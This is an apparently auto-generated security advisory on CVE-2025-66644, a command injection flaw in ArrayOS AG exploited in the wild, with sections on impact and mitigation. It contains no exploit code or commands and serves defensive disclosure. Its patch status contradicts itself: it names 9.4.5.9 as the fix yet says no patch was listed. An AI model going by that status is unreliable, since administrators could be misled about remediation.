CVE-2025-66644 is an OS command injection vulnerability identified in Array Networks' ArrayOS AG product, affecting all versions prior to 9.4.5.9. The root cause is improper neutralization of special elements used in OS commands (CWE-78), which allows an attacker with high privileges to inject and execute arbitrary commands on the underlying operating system. The vulnerability can be exploited remotely over the network without requiring user interaction, but it does require the attacker to have some level of privileges (PR:H). The flaw was actively exploited in the wild from August to December 2025, indicating that threat actors have weaponized this vulnerability. The CVSS v3.1 base score of 7.2 reflects a high-severity rating due to the potential for full system compromise, including unauthorized disclosure, modification, and disruption of services. The vulnerability affects critical infrastructure components managed by ArrayOS AG, which is widely used in enterprise and telecommunications environments for application delivery and network security. No official patches or mitigations were listed at the time of publication, emphasizing the urgency for organizations to monitor vendor updates and implement compensating controls.

The exploitation of CVE-2025-66644 can lead to complete compromise of affected ArrayOS AG devices, allowing attackers to execute arbitrary OS commands with high privileges. This can result in unauthorized access to sensitive data, disruption of network services, and potential lateral movement within enterprise networks. Given the role of ArrayOS AG in managing application delivery and network security, successful exploitation could degrade the availability and integrity of critical business applications and infrastructure. Organizations relying on vulnerable versions may face operational downtime, data breaches, and reputational damage. The vulnerability's network accessibility and lack of required user interaction increase the risk of widespread exploitation, particularly in environments where these devices are exposed to untrusted networks or the internet.

1. Immediately upgrade ArrayOS AG to version 9.4.5.9 or later once the vendor releases a patch addressing CVE-2025-66644. 2. Until patches are available, restrict network access to management interfaces of ArrayOS AG devices using firewalls and network segmentation to limit exposure to trusted administrators only. 3. Implement strict access controls and multi-factor authentication for all users with high privileges to reduce the risk of credential compromise. 4. Monitor logs and network traffic for unusual command execution patterns or unauthorized access attempts targeting ArrayOS AG devices. 5. Employ intrusion detection and prevention systems (IDS/IPS) with signatures or heuristics tuned to detect command injection attempts. 6. Conduct regular vulnerability assessments and penetration tests focusing on ArrayOS AG deployments to identify potential exploitation attempts. 7. Maintain an incident response plan specific to network infrastructure compromise scenarios to enable rapid containment and remediation.